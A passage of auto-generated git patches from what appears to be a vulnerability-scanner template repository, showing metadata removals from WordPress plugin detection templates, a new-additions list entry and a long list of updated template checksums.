a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From b8c070a70e49ddf32aeabce5a9e14a76f3b8fbc3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 5 Jul 2023 05:49:06 +0000 Subject: [PATCH 377/609] Auto Generated New Template Addition List [Wed Jul 5 05:49:06 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6a3f92ccac..f93652c3e5 100644 --- a/.new-additions +++ b/.new-additions @@ -10,3 +10,4 @@ http/exposed-panels/dell-idrac.yaml http/exposed-panels/efak-login-panel.yaml http/exposed-panels/pritunl-panel.yaml http/exposed-panels/untangle-admin-login.yaml +http/exposures/configs/collibra-properties.yaml From a0c6cd2b7faa06de6cb77711f4893d1ea32763a9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 5 Jul 2023 05:49:13 +0000 Subject: [PATCH 378/609] Auto Generated Templates Checksum [Wed Jul 5 05:49:13 UTC 2023] :robot: --- templates-checksum.txt | 417 +++++++++++++++++++++-------------------- 1 file changed, 209 insertions(+), 208 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2175cd600d..fdd33a7e41 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -215,7 +215,7 @@ helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62 helpers/wordpress/plugins/coblocks.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 helpers/wordpress/plugins/code-snippets.txt:42aae5955584904bc2d13eabc3cf07107b276398 helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/complianz-gdpr.txt:e34cf029ebf2ac799f0bb13727fc79e76b2e5ecb +helpers/wordpress/plugins/complianz-gdpr.txt:60e6b29cae222d0ccf5641a7ebe9d778961c2629 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/contact-form-7.txt:aa016b2fe9e1d5ec44a206b16f237f748a306395 helpers/wordpress/plugins/contact-form-cfdb7.txt:0d092b3544a1eeaa4d69abaaa6d6e4f15660efbe @@ -259,10 +259,10 @@ helpers/wordpress/plugins/google-listings-and-ads.txt:6b67ce6c1930ff8e1d5003aeb8 helpers/wordpress/plugins/google-site-kit.txt:744f0f894a0a521da213db9761fe60af501463a6 helpers/wordpress/plugins/google-sitemap-generator.txt:9a1ae806a7c678b6c9b4895b016033f980c1bf10 helpers/wordpress/plugins/gtranslate.txt:02aeb4dd00e9c0bb1104a19a9856dc679709da62 -helpers/wordpress/plugins/gutenberg.txt:12a04d509e74f421d6249526e0000d4f5d6bd2ba +helpers/wordpress/plugins/gutenberg.txt:b884d07998819e6e3a34cadc04acc8c6be06d9aa helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 -helpers/wordpress/plugins/header-footer-code-manager.txt:146a128cb228ff86b836ce978784899316061fa7 +helpers/wordpress/plugins/header-footer-code-manager.txt:c2e02b33da3f80da726e9cf198552626bb5042e8 helpers/wordpress/plugins/header-footer-elementor.txt:d6ab5c24c2a579838aac03076b8203376ce1d618 helpers/wordpress/plugins/header-footer.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/health-check.txt:40e124dcbde01bd9224f2d58906f34c83d1441ae @@ -286,7 +286,7 @@ helpers/wordpress/plugins/loginizer.txt:d2a825593d236a4bdf4eeecfe093c2f0318fc0f9 helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:3117538b6909fe203f45b8cdf89723893fa9aa44 -helpers/wordpress/plugins/mailpoet.txt:8ed036668dac1d8be54fd262946d9ddf7f346cef +helpers/wordpress/plugins/mailpoet.txt:6656707caddf0e344bba71919a3a123944b8ccd9 helpers/wordpress/plugins/maintenance.txt:254b136ca21ea7ce53096fd367ddb29c22a7cce9 helpers/wordpress/plugins/mainwp-child.txt:980feb4697a9a59378889074eb2a9c667eb85231 helpers/wordpress/plugins/malcare-security.txt:8a354e6fda90148b0c22992b849e693b1ed6749f @@ -297,7 +297,7 @@ helpers/wordpress/plugins/ml-slider.txt:d95eb74054f74c17f26d8fb9735af553bddddade helpers/wordpress/plugins/newsletter.txt:abdb334b7c43837f64108a70a2a66817e130b80c helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655 helpers/wordpress/plugins/nextgen-gallery.txt:9144c432d473baecd93eb0985d3874cf3bb6a126 -helpers/wordpress/plugins/ninja-forms.txt:b1fa250248667d473f40086fa4a2cd4645e99d0f +helpers/wordpress/plugins/ninja-forms.txt:34235559827d9662bd469f1ccf753f797dce542b helpers/wordpress/plugins/ocean-extra.txt:5f6af51e77b84cd6616d4eaa100a736096568d86 helpers/wordpress/plugins/official-facebook-pixel.txt:c7a799ba251102d32c4623f4036bddb752445f20 helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 @@ -351,7 +351,7 @@ helpers/wordpress/plugins/use-any-font.txt:051efab22f2c58c6d458654f9abb0b0648c47 helpers/wordpress/plugins/user-role-editor.txt:60504bf1a7119035ab8f7a2f8b0e566bf4a6dff3 helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 helpers/wordpress/plugins/w3-total-cache.txt:7cfe54f27289e2e996bf2e77df14202ff94111f9 -helpers/wordpress/plugins/webp-converter-for-media.txt:93ab266c89e9dcb536484607a605b05e657be940 +helpers/wordpress/plugins/webp-converter-for-media.txt:95b759e60a8e7227aa313fd23cdef6f7a370841d helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:a9d2178a3e60db128675c6658f16be3165b8e0f1 @@ -382,7 +382,7 @@ helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 helpers/wordpress/plugins/wp-smushit.txt:9fa03c66ac4ea9ec21b6098ba43e9b00b5292ee0 -helpers/wordpress/plugins/wp-statistics.txt:abe921367c8e125cf93ae37799251c8c4dc1bd22 +helpers/wordpress/plugins/wp-statistics.txt:2e82474b0edd5bf8921bf46965dbc65a7cbfd3b0 helpers/wordpress/plugins/wp-super-cache.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-user-avatar.txt:06a4c8fb3498a24c86d06fd73d56763fee83924e helpers/wordpress/plugins/wpcf7-recaptcha.txt:e864410c570d87244a122a31198944fa5ab9260e @@ -3392,6 +3392,7 @@ http/exposures/configs/circleci-ssh-config.yaml:18d32e88826710a1b8c9ec73576f6aae http/exposures/configs/cisco-network-config.yaml:f159889b638528c4acdadff6e18f3d2a70ec586e http/exposures/configs/codeception-config.yaml:e8c89a76b7831aa1656674732f61bcf243d4a084 http/exposures/configs/codeigniter-env.yaml:c05bb8e3c81ffa2400f9a05f5c74c5be2148bdfc +http/exposures/configs/collibra-properties.yaml:eda059f3c5ff33d0f17dbd4d2e08dbb03358d109 http/exposures/configs/composer-config.yaml:3f01cc8777b325a3a165c4336f1fbd68b6bfa989 http/exposures/configs/config-json.yaml:12b570a3b9a3dc713b0ec4d73b1f68ff9dba9123 http/exposures/configs/config-properties.yaml:15f9e7ca135d3ccf0ceea4feb93857b78fab76ea @@ -5340,214 +5341,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 -http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 -http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 